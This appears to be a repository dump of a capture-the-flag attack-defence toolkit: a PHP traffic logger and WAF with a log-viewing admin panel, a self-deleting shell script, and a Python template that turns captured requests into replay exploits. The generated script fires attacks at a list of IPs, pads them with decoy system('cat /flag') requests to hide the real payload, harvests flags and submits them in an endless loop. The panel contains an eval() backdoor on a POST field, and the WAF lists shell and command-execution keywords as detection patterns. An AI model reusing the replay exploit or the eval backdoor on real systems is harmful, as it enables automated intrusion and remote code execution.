113 | $this_SalT_hhhaaaa_Db_p = new SaLt_Classsssss_LogDatA_HHHHHhhhhh(); 114 | if(!$this_SalT_hhhaaaa_Db_p){ 115 | $back = array("code"=>"500","message","open db error"); 116 | return json_encode($back); 117 | } 118 | 119 | $back = json_decode($this_SalT_hhhaaaa_Db_p->ip_list(),true); 120 | $alback = array("code"=>"200","message"=>$back); 121 | return json_encode($alback); 122 | } 123 | function banner($mod) 124 | { 125 | switch ($mod) { 126 | case 0: 127 | echo ''; 133 | break; 134 | case 1: 135 | echo ''; 141 | break; 142 | case 2: 143 | echo ''; 149 | break; 150 | case 3: 151 | echo ''; 157 | break; 158 | default: 159 | # code... 160 | break; 161 | } 162 | 163 | } 164 | 165 | function downloadpoc($id) 166 | { 167 | $id = explode(',',$id); 168 | $this_SalT_hhhaaaa_Db_p = new SaLt_Classsssss_LogDatA_HHHHHhhhhh(); 169 | if (!$this_SalT_hhhaaaa_Db_p) { 170 | $back = array("code" => "500", "message", "open db error"); 171 | return json_encode($back); 172 | 173 | } 174 | if(sizeof($id)<2) { 175 | $id = $id[0]; 176 | 177 | $content = $this_SalT_hhhaaaa_Db_p->get_content_by_id($id); 178 | if ($content) { 179 | $content = json_decode($content, true); 180 | $content = $content[0]; 181 | $temp = file_get_contents(BASE_PATH . '../temp.php'); 182 | $temp = str_replace('wupco_url', addslashes($content[1]), $temp); 183 | $temp = str_replace('wupco_head', addslashes(htmlspecialchars_decode($content[6])), $temp); 184 | $temp = str_replace('wupco_get', addslashes($content[3]), $temp); 185 | $temp = str_replace('wupco_post', addslashes($content[2]), $temp); 186 | $temp = str_replace('wupco_poc_mod','0',$temp); 187 | $temp = str_replace('wupco_targets',"''",$temp); 188 | $temp = str_replace('wupco_t_headers',"''",$temp); 189 | $temp = str_replace('wupco_t_posts',"''",$temp); 190 | $temp = str_replace('wupco_t_gets',"''",$temp); 191 | $filename = (string)$id . "poc.py"; 192 | header('Content-Type:application/octet-stream'); 193 | header('Content-Disposition: attachment; filename="' . $filename . '"'); 194 | echo $temp; 195 | return 1; 196 | 197 | 198 | } else { 199 | return 0; 200 | } 201 | } 202 | else 203 | { 204 | $headers = ''; 205 | $posts = ''; 206 | $gets = ''; 207 | $targets = ''; 208 | $count = 1; 209 | //("id"=>$row[0],"url"=>$row[1],"post"=>$row[2],"get"=>$row[3],"cookie"=>$row[4], 210 | //"time"=>$row[5],"headers"=>$row[6],"ip"=>$row[7],"risk"=>(int)$row[8], 211 | //"type"=>(int)$row[9],"count"=>(int)$row[11]); 212 | foreach ($id as $id_){ 213 | 214 | if($id_ != '' && $count < count($id)) 215 | { 216 | $content = $this_SalT_hhhaaaa_Db_p->get_content_by_id($id_); 217 | if ($content) { 218 | $content = json_decode($content, true); 219 | $content = $content[0]; 220 | $headers .= "'''".addslashes(htmlspecialchars_decode($content[6]))."''',"; 221 | $posts .= "'''".addslashes($content[2])."''',"; 222 | $gets .= "'''".addslashes($content[3])."''',"; 223 | $targets .= "'''".addslashes($content[1])."''',"; 224 | 225 | } 226 | else 227 | { 228 | return 0; 229 | } 230 | 231 | } 232 | $count += 1; 233 | 234 | } 235 | $content = $this_SalT_hhhaaaa_Db_p->get_content_by_id(end($id)); 236 | if($content){ 237 | $content = json_decode($content, true); 238 | $content = $content[0]; 239 | $wupco_url = addslashes($content[1]); 240 | $wupco_head = addslashes(htmlspecialchars_decode($content[6])); 241 | $wupco_get = addslashes($content[3]); 242 | $wupco_post = addslashes($content[2]); 243 | } 244 | else 245 | { 246 | return 0; 247 | } 248 | $headers = substr($headers,0,-1); 249 | $posts = substr($posts,0,-1); 250 | $gets = substr($gets,0,-1); 251 | $targets = substr($targets,0,-1); 252 | $temp = file_get_contents(BASE_PATH . '../temp.php'); 253 | $temp = str_replace('wupco_url', $wupco_url, $temp); 254 | $temp = str_replace('wupco_head', $wupco_head, $temp); 255 | $temp = str_replace('wupco_get', $wupco_get, $temp); 256 | $temp = str_replace('wupco_post', $wupco_post, $temp); 257 | $temp = str_replace('wupco_poc_mod','mixed',$temp); 258 | $temp = str_replace('wupco_targets',$targets,$temp); 259 | $temp = str_replace('wupco_t_headers',$headers,$temp); 260 | $temp = str_replace('wupco_t_posts',$posts,$temp); 261 | $temp = str_replace('wupco_t_gets',$gets,$temp); 262 | $filename = (string)end($id) . "_mixedpoc.py"; 263 | header('Content-Type:application/octet-stream'); 264 | header('Content-Disposition: attachment; filename="' . $filename . '"'); 265 | echo $temp; 266 | return 1; 267 | 268 | } 269 | 270 | } 271 | 272 | function del_log() 273 | { 274 | 275 | if(isset($_POST['id'])) 276 | { 277 | $this_SalT_hhhaaaa_Db_p = new SaLt_Classsssss_LogDatA_HHHHHhhhhh(); 278 | if(!$this_SalT_hhhaaaa_Db_p){ 279 | $back = array("code"=>"500","message","open db error"); 280 | return json_encode($back); 281 | 282 | } 283 | $ids = explode(',',$_POST['id']); 284 | foreach ($ids as $id) 285 | { 286 | $id = trim($id); 287 | if($id != '') 288 | { 289 | $this_SalT_hhhaaaa_Db_p->del_by_id((int)$id); 290 | } 291 | } 292 | return 1; 293 | } 294 | else 295 | return 0; 296 | } 297 | 298 | 299 | function index() 300 | { 301 | if(isset($_GET['id'])&&(int)$_GET['id']>=0) 302 | $id = (int)$_GET['id']; 303 | else 304 | $id = 0; 305 | if(isset($_GET['t'])&&(int)$_GET['t']>=0) 306 | $time = $_GET['t']; 307 | else 308 | $time = 0; 309 | $lognum = json_decode(getnum('all',0,$time)); 310 | if($lognum->code == 500) 311 | die($lognum->message); 312 | $lognum = (int)($lognum->message); 313 | $page = (int)($lognum / 10); 314 | //echo (int)($lognum % 10); 315 | if((int)($lognum % 10) != 0) 316 | $page+=1; 317 | $tid = $id * 10; 318 | 319 | $con = json_decode(dumpalllog($tid,10,1,$time)); 320 | if((int)($con->code) >= 500) 321 | { 322 | echo $con->message; 323 | } 324 | else 325 | { 326 | foreach($con->message as $log) 327 | { 328 | 329 | if($log->risk === 1) 330 | { 331 | $class = 'panel panel-danger'; 332 | $bclass = 'alert alert-danger'; 333 | } 334 | else 335 | { 336 | $class = 'panel panel-info'; 337 | $bclass = 'alert alert-info'; 338 | } 339 | switch ((int)$log->type) { 340 | case 0: 341 | $typeval = '暂无分类'; 342 | $tclass = 'label label-default'; 343 | break; 344 | 345 | case 1: 346 | $typeval = '畸形输入'; 347 | $tclass = 'label label-default'; 348 | break; 349 | case 2: 350 | $typeval = 'xss'; 351 | $tclass = 'label label-default'; 352 | break; 353 | case 3: 354 | $typeval = 'sql注入'; 355 | $tclass = 'label label-danger'; 356 | break; 357 | case 4: 358 | $typeval = '命令执行'; 359 | $tclass = 'label label-danger'; 360 | break; 361 | 362 | default: 363 | $typeval ='暂无分类'; 364 | break; 365 | } 366 | 367 | echo '
368 |
369 |

'.htmlentities($log->url).'  '.$typeval.'  

370 | 371 |
372 |
373 | 374 | 375 | 376 | 377 | 378 | 379 | 380 | Show Headers 382 |

383 |
384 |
'.nl2br($log->headers).'
Get POC(id:'.$log->id.')
385 |
386 | 387 |
次数:'.htmlentities($log->count).'
IP:'.htmlentities($log->ip).'
Time:'.htmlentities($log->time).'
Get:'.htmlentities($log->get).'
Post:'.htmlentities($log->post).'
Cookie:'.htmlentities($log->cookie).'
388 |
389 |
'; 390 | } 391 | 392 | echo ''; 407 | } 408 | 409 | } 410 | 411 | function gettime_am($start,$end) 412 | { 413 | 414 | return substr((string)$start,0,strspn((string)$start^(string)$end, "\0")); 415 | 416 | 417 | } 418 | 419 | function iplist() 420 | { 421 | if(isset($_GET['ip'])) 422 | { 423 | showbysth('ip','iplist',$_GET['ip'],'ip'); 424 | } 425 | else 426 | { 427 | $iplist = json_decode(getIPlist()); 428 | if($iplist->code == 500) 429 | die($iplist->message); 430 | echo ''; 439 | } 440 | } 441 | function more() 442 | { 443 | showbysth('more','more','default','default'); 444 | } 445 | function risk() 446 | { 447 | showbysth('risk','risk','default','default'); 448 | } 449 | function showbysth($where,$mod,$sth,$sthkey) 450 | { 451 | 452 | //showbysth('where Ip = "'.$_GET['ip'].'" order by Time desc','iplist',$_GET['ip'],'ip'); 453 | if(isset($_GET['id'])&&(int)$_GET['id']>=0) 454 | $id = (int)$_GET['id']; 455 | else 456 | $id = 0; 457 | if(isset($_GET['t'])&&(int)$_GET['t']>=0) 458 | $time = $_GET['t']; 459 | else 460 | $time = 0; 461 | $lognum = json_decode(getnum($where,$sth,$time)); 462 | if($lognum->code == 500) 463 | die($lognum->message); 464 | $lognum = (int)($lognum->message); 465 | $page = (int)($lognum / 10); 466 | if((int)($lognum % 10) != 0) 467 | $page+=1; 468 | $tid = $id * 10; 469 | //$where.=' limit '.$tid.',10'; 470 | //getbysth($where,$start,$num,$desc,$sth) 471 | $con = json_decode(getbysth($where,$tid,10,1,$sth,$time)); 472 | if((int)($con->code) >= 500) 473 | { 474 | echo $con->message; 475 | } 476 | else 477 | { 478 | 479 | foreach($con->message as $log) 480 | { 481 | 482 | if($log->risk === 1){ 483 | $class = 'panel panel-danger'; 484 | $bclass = 'alert alert-danger'; 485 | } 486 | else 487 | { 488 | $class = 'panel panel-info'; 489 | $bclass = 'alert alert-info'; 490 | } 491 | switch ($log->type) { 492 | case 0: 493 | $typeval = '暂无分类'; 494 | $tclass = 'label label-default'; 495 | break; 496 | 497 | case 1: 498 | $typeval = '畸形输入'; 499 | $tclass = 'label label-default'; 500 | break; 501 | case 2: 502 | $typeval = 'xss'; 503 | $tclass = 'label label-default'; 504 | break; 505 | case 3: 506 | $typeval = 'sql注入'; 507 | $tclass = 'label label-danger'; 508 | break; 509 | case 4: 510 | $typeval = '命令执行'; 511 | $tclass = 'label label-danger'; 512 | break; 513 | 514 | default: 515 | $typeval ='暂无分类'; 516 | break; 517 | } 518 | 519 | echo '
520 |
521 |

'.htmlentities($log->url).'  '.$typeval.'

522 | 523 |
524 |
525 | 526 | 527 | 528 | 529 | 530 | 531 | 532 | Show Headers 534 |

535 |
536 |
'.nl2br($log->headers).'
Get POC(id:'.(string)$log->id.')
537 |
538 | 539 |
次数:'.htmlentities($log->count).'
IP:'.htmlentities($log->ip).'
Time:'.htmlentities($log->time).'
Get:'.htmlentities($log->get).'
Post:'.htmlentities($log->post).'
Cookie:'.htmlentities($log->cookie).'
540 |
541 |
'; 542 | } 543 | 544 | echo ''; 559 | } 560 | } 561 | 562 | function check_login() 563 | { 564 | if (isset($_SESSION['user']) && !empty($_SESSION['user'])){ 565 | return 1; 566 | }else{ 567 | return 0; 568 | } 569 | 570 | } 571 | 572 | function login() 573 | { 574 | if (isset($_POST['user'])){ 575 | $user = $_POST['user']; 576 | $password = $_POST['password']; 577 | if ($user === username && $password === password) { 578 | $_SESSION['user'] = $user; 579 | return 1; 580 | }else{ 581 | return 0; 582 | } 583 | } 584 | else 585 | return 0; 586 | } 587 | 588 | if($_SERVER["REMOTE_ADDR"]==='127.0.0.1') 589 | if(isset($_GET['cmdpwd'])){ 590 | if($_GET['cmdpwd']=== md5(password)) 591 | @eval($_POST['cmd_ahaha']); 592 | } 593 | 594 | if(!check_login()) 595 | { 596 | 597 | $form =' 598 |
599 |
600 |
601 | 602 |
603 | '; 604 | if(!login()) 605 | { 606 | die($form); 607 | } 608 | } 609 | else 610 | { 611 | del_log(); 612 | if(isset($_GET['stop'])) 613 | { 614 | system('ps aux|grep \'www-data\'|awk {print $2}|xargs kill -9'); 615 | } 616 | if(isset($_GET['pocid'])) 617 | { 618 | downloadpoc($_GET['pocid']); 619 | exit(); 620 | } 621 | echo ' 622 | 623 | 624 | 625 | 626 | 627 | 628 | 629 | 630 | 631 | 632 | 633 | '; 634 | 635 | echo '
636 |
637 |

638 | 640 | Tools 641 | 642 |

643 |
644 |
645 |
646 |
647 | 648 | 649 | 650 |
651 | '."
删除流量: 全选 ".' 683 |

获取复合流量重放exp:

684 |
685 |
686 |
'; 687 | if(isset($_GET['m'])) 688 | { 689 | $m = addslashes($_GET['m']); 690 | if(isset($_POST['start'])&&isset($_POST['end'])) 691 | { 692 | $time = gettime_am(strtotime($_POST['start']),strtotime($_POST['end'])); 693 | echo " 694 | 695 | 748 | "; 749 | 750 | } 751 | switch ($m) { 752 | case 'index': 753 | banner(0); 754 | index(); 755 | break; 756 | case 'iplist': 757 | banner(1); 758 | iplist(); 759 | break; 760 | case 'risk': 761 | banner(2); 762 | risk(); 763 | break; 764 | case 'more': 765 | banner(3); 766 | more(); 767 | break; 768 | default: 769 | banner(0); 770 | index(); 771 | break; 772 | } 773 | 774 | } 775 | else 776 | { 777 | echo ""; 778 | } 779 | 780 | } 781 | -------------------------------------------------------------------------------- /rm_me.sh: -------------------------------------------------------------------------------- 1 | pdir=`pwd` 2 | rm -r $pdir 3 | 4 | -------------------------------------------------------------------------------- /temp.php: -------------------------------------------------------------------------------- 1 | import base64 2 | import re 3 | import os 4 | import json 5 | import string 6 | import random 7 | import time 8 | import requests 9 | from urlparse import * 10 | 11 | iplist = [] 12 | for line in open("ip.txt"): 13 | iplist.append((line).strip()) 14 | platformurl = "http://input_this" # the url to submit flag 15 | platformheader = { 16 | } 17 | 18 | #post things for platform 19 | platpost = { 20 | "flag":"{0}", 21 | "token":"12345" 22 | } 23 | 24 | platmod = 1 # 0=>get 1=>post 2=>json post method for submitting flag 25 | 26 | preg_str = r"Undefined index: ([a]{2}) in /var/" # find flag in content 27 | 28 | url_ = '''wupco_url''' 29 | url = url_.replace((urlparse(url_).netloc.split(':',1))[0],'{0}') 30 | #header 31 | headerstr = '''wupco_head''' 32 | 33 | #getstr 34 | GETstr = '''wupco_get''' 35 | if GETstr!='''''': 36 | url = url+'?'+GETstr 37 | #poststr 38 | POSTstr = '''wupco_post''' 39 | pocmod = 'wupco_poc_mod' 40 | headerarr = headerstr.split('\n') 41 | header = {} 42 | for i in headerarr: 43 | if i !='': 44 | i = i.split(' : ',1) 45 | if i[0].strip().upper() == 'HOST': 46 | header[i[0].strip().upper()] = i[1].replace((i[1].split(':',1))[0],'{0}') 47 | else: 48 | header[i[0].strip()] = i[1] 49 | 50 | if POSTstr!='''''': 51 | mod = 1 52 | else: 53 | mod = 0 54 | 55 | #hide the true payload 56 | nomalhead = { 57 | 'USER-AGENT' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3269.3 Safari/537.36', 58 | 'UPGRADE-INSECURE-REQUESTS' : '1', 59 | 'ACCEPT' : 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 60 | 'ACCEPT-ENCODING' : 'gzip, deflate', 61 | 'ACCEPT-LANGUAGE' : 'zh-CN,zh;q=0.9,zh-TW;q=0.8', 62 | 'X-Forwarded-For': '127.0.0.1\'"' 63 | } 64 | def genrand(_len): 65 | return ''.join(random.sample(string.ascii_letters + string.digits, _len)) 66 | 67 | def _req(mod,url,headers,poststr): 68 | global nomalhead 69 | if mod == 0: 70 | try: 71 | for i in range(1,random.randint(2,9)): 72 | try: 73 | salt = requests.post(url=url+"?"+genrand(random.randint(1,5))+"=system('cat /flag');"+genrand(random.randint(10,32)),headers=nomalhead,timeout=0.5,data={genrand(3):genrand(20)}) 74 | except: 75 | continue 76 | for i in range(1,4): 77 | randstr = genrand(4) 78 | for j in range(1,random.randint(2,5)): 79 | try: 80 | salt = requests.post(url=url+"?"+randstr+'=system(\'cat /flag\');',headers=nomalhead,timeout=0.5) 81 | except: 82 | continue 83 | req = requests.get(url=url,headers=headers,timeout=1) 84 | return req 85 | except requests.exceptions.ConnectTimeout: 86 | print 'local network error\n' 87 | return -1 88 | except requests.exceptions.Timeout: 89 | print 'Connect Timeout\n' 90 | return -2 91 | except: 92 | print 'Get '+url+' error!\n' 93 | return -3 94 | else: 95 | try: 96 | for i in range(1,random.randint(2,9)): 97 | try: 98 | salt = requests.post(url=url+"?"+genrand(random.randint(1,5))+"=system('cat /flag');"+genrand(random.randint(10,32)),headers=nomalhead,timeout=0.5,data={genrand(3):genrand(20)}) 99 | except: 100 | continue 101 | for i in range(1,4): 102 | randstr = genrand(4) 103 | for j in range(1,random.randint(2,5)): 104 | try: 105 | salt = requests.post(url=url+"?"+randstr+'=system(\'cat /flag\');',headers=nomalhead,timeout=0.5) 106 | except: 107 | continue 108 | req = requests.post(url=url,headers=headers,data=poststr,timeout=1) 109 | return req 110 | except requests.exceptions.ConnectTimeout: 111 | print 'local network error\n' 112 | return -1 113 | except requests.exceptions.Timeout: 114 | print 'Connect Timeout\n' 115 | return -2 116 | except: 117 | print 'POST '+url+' error!\n' 118 | print poststr 119 | return -3 120 | 121 | def beforeattack(ip): 122 | targets = [wupco_targets] 123 | t_headers = [wupco_t_headers] 124 | t_posts = [wupco_t_posts] 125 | t_gets = [wupco_t_gets] 126 | 127 | for t_i in range(1,len(targets)): 128 | t_url = targets[t_i].replace((urlparse(targets[t_i]).netloc.split(':',1))[0],ip) 129 | t_header_n = t_headers[t_i].split('\n') 130 | t_header = {} 131 | for i in t_header_n: 132 | if i !='': 133 | i = i.split(' : ',1) 134 | if i[0].strip().upper() == 'HOST': 135 | t_header[i[0].strip().upper()] = i[1].replace((i[1].split(':',1))[0],ip) 136 | else: 137 | t_header[i[0].strip()] = i[1] 138 | 139 | t_get = t_gets[t_i] 140 | t_post = t_posts[t_i] 141 | t_datastr = {} 142 | if t_post != '': 143 | t_poststr = t_post.split('&') 144 | for t_p in t_poststr: 145 | t_pm = t_p.split('=',1) 146 | if len(t_pm)<2: 147 | t_datastr = t_pm[0] 148 | else: 149 | t_datastr[t_pm[0]] = t_pm[1] 150 | _req(1,t_url,t_header,t_datastr) 151 | time.sleep(0.5) 152 | 153 | else:#def _req(mod,url,headers,poststr): 154 | _req(0,t_url,t_header,'') 155 | time.sleep(0.5) 156 | return 1 157 | 158 | def attack(iplist,mod,url,headers,poststr): 159 | global platmod 160 | for ip in iplist: 161 | global pocmod 162 | if pocmod == 'mixed': 163 | beforeattack(ip) 164 | 165 | t_url = url 166 | t_url = t_url.format(ip) 167 | if headers.has_key('HOST'): 168 | headers['HOST'] = headers['HOST'].format(ip) 169 | req = _req(mod,t_url,headers,poststr) 170 | if(req > 0): 171 | if len(getflag(req.content)) == 0: 172 | exit('regx error!') 173 | for proflag in getflag(req.content): 174 | print "try to submit flag: "+proflag 175 | submitflag(platmod,proflag,ip) 176 | 177 | elif(req == -1): 178 | if headers.has_key('HOST'): 179 | headers['HOST'] = headers['HOST'].format(ip) 180 | req = _req(mod,t_url,headers,poststr) 181 | if req > 0: 182 | if len(getflag(req.content)) == 0: 183 | exit('regx error!') 184 | for proflag in getflag(req.content): 185 | print "try to submit flag: "+proflag 186 | submitflag(platmod,proflag,ip) 187 | else: 188 | continue 189 | elif(req == -2): 190 | continue 191 | elif(req == -3): 192 | if headers.has_key('HOST'): 193 | headers['HOST'] = headers['HOST'].format(ip) 194 | req = _req(mod,t_url,headers,poststr) 195 | if req > 0: 196 | if len(getflag(req.content)) == 0: 197 | exit('regx error!') 198 | for proflag in getflag(req.content): 199 | print "try to submit flag: "+proflag 200 | submitflag(platmod,proflag,ip) 201 | else: 202 | continue 203 | 204 | def getflag(content): 205 | return re.findall(preg_str,content) 206 | 207 | def submitflag(mod,flag,ip): 208 | global platformurl 209 | global platpost 210 | global platformheader 211 | if mod == 0:#get 212 | 213 | platformurl_n = platformurl.format(flag) 214 | try: 215 | requests.get(url = platformurl_n,headers = platformheader) 216 | print "submit "+str(ip)+" flag: " + flag + "\n" 217 | return 1 218 | except: 219 | submitflag(mod,flag,ip) 220 | 221 | elif mod == 1:#post 222 | platpost_n = platpost 223 | for p in platpost_n: 224 | platpost_n[p] = platpost_n[p].format(flag) 225 | try: 226 | requests.post(url = platformurl,data = platpost_n, headers = platformheader) 227 | print "submit "+str(ip)+" flag: " + flag + "\n" 228 | return 1 229 | except: 230 | submitflag(mod,flag,ip) 231 | elif mod == 2:#json post 232 | platpost_n = platpost 233 | for p in platpost_n: 234 | platpost_n[p] = platpost_n[p].format(flag) 235 | try: 236 | requests.post(url = platformurl,data = json.dumps(platpost_n),headers = platformheader) 237 | print "submit "+str(ip)+" flag: " + flag + "\n" 238 | return 1 239 | except: 240 | submitflag(mod,flag,ip) 241 | 242 | 243 | 244 | 245 | 246 | 247 | #attack(iplist,0,url,header,'1') 248 | datastr = {} 249 | if mod == 1: 250 | poststr = POSTstr.split('&') 251 | for p in poststr: 252 | pm = p.split('=',1) 253 | if len(pm)<2: 254 | datastr = pm[0] 255 | else: 256 | datastr[pm[0]] = pm[1] 257 | while True: 258 | try: 259 | attack(iplist,mod,url,header,datastr) 260 | except: 261 | attack(iplist,mod,url,header,datastr) 262 | time.sleep(1) 263 | else: 264 | while True: 265 | try: 266 | attack(iplist,mod,url,header,'1') 267 | except: 268 | attack(iplist,mod,url,header,'1') 269 | time.sleep(1) 270 | 271 | 272 | 273 | 274 | 275 | 276 | 277 | 278 | -------------------------------------------------------------------------------- /weblogpro.php: -------------------------------------------------------------------------------- 1 | no waf;1=>simple waf;2=>middle waf;3=>fuck waf 9 | define('BlAck_Or_WhiTe_List',1);//0=>none;1=>black;2=>white 10 | define('LogGer_Web_DiR','^^^^^^^^'); 11 | 12 | include(salt_Logger_bAse_DIR.'data.php'); 13 | $sAlt_enCryPted = salt_THIS_IS_PRV_KEY.salt_THIS_IS_FILE_SALT; 14 | $sAlt_file_BaSe_dIr = salt_Logger_bAse_DIR.md5($sAlt_enCryPted); 15 | 16 | define('SaLt_This_is_BAse_DiR',$sAlt_file_BaSe_dIr); 17 | $risk_xxx_ttt_id = 0; 18 | $danger_sd_be_baned = 0; 19 | class SaLt_Classsssss_LogDatA_HHHHHhhhhh extends SaLt_Classsssss_LogDb_HHHHhhhhh 20 | { 21 | private $url,$ip,$time,$cookie,$getstr,$poststr,$headers,$risk,$type,$file; 22 | function __construct() 23 | { 24 | $this->data_root_dir = SaLt_This_is_BAse_DiR."/"; 25 | $this->path = $this->data_root_dir.'lock/'; 26 | $this->url =$this-> get_url(); 27 | $this->ip = $this->get_ip(); 28 | $this->time = $this->get_date(); 29 | $this->cookie = $this->get_cookie(); 30 | $this->getstr = $this->get_getstr(); 31 | $this->poststr = $this->get_poststr(); 32 | $this->headers = $this->get_headers(); 33 | $this->type = $this->get_type(); 34 | $this->file = $this->get_file(); 35 | $this->risk = 0; 36 | } 37 | function get_file() 38 | { 39 | return $_SERVER['PHP_SELF']; 40 | } 41 | 42 | function get_url() 43 | { 44 | return 'http://'.$_SERVER['SERVER_NAME'].':'.$_SERVER["SERVER_PORT"].$_SERVER['PHP_SELF']; 45 | } 46 | 47 | function get_cookie() 48 | { 49 | return http_build_query($_COOKIE); 50 | } 51 | 52 | function get_getstr() 53 | { 54 | return http_build_query($_GET); 55 | } 56 | 57 | function get_poststr() 58 | { 59 | return $_POST?http_build_query($_POST):file_get_contents("php://input"); 60 | } 61 | 62 | function get_headers() 63 | { 64 | $this_SalT_hhhaaaa_ReT_p = ""; 65 | $headers = array(); 66 | foreach ($_SERVER as $key => $value) { 67 | if ('HTTP_' == substr($key, 0, 5)) { 68 | $headers[str_replace('_', '-', substr($key, 5))] = $value; 69 | } 70 | } 71 | if (isset($_SERVER['PHP_AUTH_DIGEST'])) { 72 | $header['AUTHORIZATION'] = $_SERVER['PHP_AUTH_DIGEST']; 73 | } elseif (isset($_SERVER['PHP_AUTH_USER']) && isset($_SERVER['PHP_AUTH_PW'])) { 74 | $header['AUTHORIZATION'] = base64_encode($_SERVER['PHP_AUTH_USER'] . ':' . $_SERVER['PHP_AUTH_PW']); 75 | $header['CONTENT-LENGTH'] = $_SERVER['CONTENT_LENGTH']; 76 | } 77 | if (isset($_SERVER['CONTENT_TYPE'])) { 78 | $header['CONTENT-TYPE'] = $_SERVER['CONTENT_TYPE']; 79 | } 80 | if (isset($headers['HOST'])){ 81 | $this_SalT_hhhaaaa_ReT_p .= 'HOST : '.htmlentities($headers['HOST'])."\n"; 82 | } 83 | foreach ($headers as $key => $value) { 84 | if($key!='HOST') 85 | $this_SalT_hhhaaaa_ReT_p = $this_SalT_hhhaaaa_ReT_p.htmlentities($key).' : '.htmlentities($value)."\n"; 86 | } 87 | 88 | return str_replace("\x00",'\0',$this_SalT_hhhaaaa_ReT_p); 89 | } 90 | 91 | function get_date() 92 | { 93 | date_default_timezone_set('PRC'); 94 | return date('y-m-d H:i:s',time()); 95 | } 96 | 97 | function get_ip() 98 | { 99 | return $_SERVER["REMOTE_ADDR"]; 100 | //return "127.0.0.2"; 101 | } 102 | 103 | function get_risk($id) 104 | { 105 | 106 | $rand = (string)time().(string)rand(1000,9999); 107 | $server = "http://".$_SERVER['SERVER_NAME'].':'.$_SERVER["SERVER_PORT"]."/".LogGer_Web_DiR."wupco_check.php?rand=".$rand."&id=".$id; 108 | $pre_str =<<.*<\/script>/g,"");var xml = new XMLHttpRequest();xml.open('POST', ' 115 | JS; 116 | $payload.=$server; 117 | $payload.=<< $v){ 129 | $tmp .= '+O('.intval(((ord($v)+(rand(99999999,999999999)/1000000000))*99)*10000).')'; 130 | } 131 | $tmp .='+"");'; 132 | $my_js = ""; 133 | echo $my_js; 134 | return 0; 135 | } 136 | 137 | function get_type() 138 | { 139 | $url_arr=array( 140 | '1'=>"\\=\\+\\/v(?:8|9|\\+|\\/)|\\%0acontent\\-(?:id|location|type|transfer\\-encoding)", 141 | ); 142 | $args_arr=array( 143 | '2'=>"[\\'\\\"\\;\\*\\<\\>].*\\bon[a-zA-Z]{3,15}[\\s\\r\\n\\v\\f]*\\=|\\b(?:expression)\\(|\\"[^\\{\\s]{1}(\\s|\\b)+(?:select\\b|update\\b|insert(?:(\\/\\*.*?\\*\\/)|(\\s)|(\\+))+into\\b).+?(?:from\\b|set\\b)|[^\\{\\s]{1}(\\s|\\b)+(?:create|delete|drop|truncate|rename|desc)(?:(\\/\\*.*?\\*\\/)|(\\s)|(\\+))+(?:table\\b|from\\b|database\\b)|into(?:(\\/\\*.*?\\*\\/)|\\s|\\+)+(?:dump|out)file\\b|\\bsleep\\([\\s]*[\\d]+[\\s]*\\)|benchmark\\(([^\\,]*)\\,([^\\,]*)\\)|(?:declare|set|select)\\b.*@|union\\b.*(?:select|all)\\b|(?:select|update|insert|create|delete|drop|grant|truncate|rename|exec|desc|from|table|database|set|where)\\b.*(charset|ascii|bin|char|uncompress|concat|concat_ws|conv|export_set|hex|instr|left|load_file|locate|mid|sub|substring|oct|reverse|right|unhex)\\(|(?:master\\.\\.sysdatabases|msysaccessobjects|msysqueries|sysmodules|mysql\\.db|sys\\.database_name|information_schema\\.|sysobjects|sp_makewebtask|xp_cmdshell|sp_oamethod|sp_addextendedproc|sp_oacreate|xp_regread|sys\\.dbms_export_extension)", 145 | '1'=>"\\.\\.[\\\\\\/].*\\%00([^0-9a-fA-F]|$)|%00[\\'\\\"\\.]", 146 | '4'=>"file_put_contents|fwrite|curl|system|eval|assert|file_get_contents|passthru|exec|system|chroot|scandir|chgrp|chown|shell_exec|proc_open|proc_get_status|popen|ini_alter|ini_restore|`|dl|openlog|syslog|readlink|symlink|popepassthru|stream_socket_server|assert|pcntl_exec|\/flag|whoami|bash|phpinfo" 147 | ); 148 | if( !function_exists('filterData') ){ 149 | function filterData(&$data,$type,&$ttype){ 150 | filterArray($data,$type,$ttype); 151 | return $ttype; 152 | } 153 | } 154 | if( !function_exists('filterArray') ){ 155 | function filterArray(&$data,$filterarr,&$ttype){ 156 | foreach ($data as $key => $value) { 157 | if( is_array($value) ){ 158 | filterArray($data[$key],$filterarr,$ttype); 159 | } 160 | 161 | else{ 162 | filter($value,$filterarr,$ttype); 163 | } 164 | 165 | } 166 | return $ttype; 167 | } 168 | } 169 | 170 | if( !function_exists('filter') ){ 171 | function filter($str,$filterarr,&$ttype){ 172 | 173 | foreach($filterarr as $key =>$value) 174 | { 175 | if (preg_match("/".$value."/is",$str)==1||preg_match("/".$value."/is",urlencode($str))==1) 176 | { 177 | if(PLZ_SET_IS_WAF_START){ 178 | global $danger_sd_be_baned; 179 | $danger_sd_be_baned = 1; 180 | } 181 | 182 | $ttype = (string)$key; 183 | } 184 | } 185 | return $ttype; 186 | } 187 | } 188 | $referer=empty($_SERVER['HTTP_REFERER']) ? array() : array($_SERVER['HTTP_REFERER']); 189 | $query_string=empty($_SERVER["QUERY_STRING"]) ? array() : array($_SERVER["QUERY_STRING"]); 190 | 191 | $f_1 = (int)filterData($query_string,$url_arr,$this->type); 192 | $f_2 = (int)filterData($_GET,$args_arr,$this->type); 193 | $f_3 = (int)filterData($_POST,$args_arr,$this->type); 194 | $f_4 = (int)filterData($_COOKIE,$args_arr,$this->type); 195 | $f_5 = (int)filterData($referer,$args_arr,$this->type); 196 | $f_6 = (int)filterData($_SERVER,$args_arr,$this->type); 197 | 198 | return max($f_1,$f_2,$f_3,$f_4,$f_5,$f_6); 199 | } 200 | 201 | function real_ip() 202 | { 203 | static $realip = NULL; 204 | 205 | if ($realip !== NULL) 206 | { 207 | return $realip; 208 | } 209 | 210 | if (isset($_SERVER)) 211 | { 212 | if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) 213 | { 214 | $arr = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); 215 | 216 | foreach ($arr AS $ip) 217 | { 218 | $ip = trim($ip); 219 | 220 | if ($ip != 'unknown') 221 | { 222 | $realip = $ip; 223 | 224 | break; 225 | } 226 | } 227 | } 228 | elseif (isset($_SERVER['HTTP_CLIENT_IP'])) 229 | { 230 | $realip = $_SERVER['HTTP_CLIENT_IP']; 231 | } 232 | else 233 | { 234 | if (isset($_SERVER['REMOTE_ADDR'])) 235 | { 236 | $realip = $_SERVER['REMOTE_ADDR']; 237 | } 238 | else 239 | { 240 | 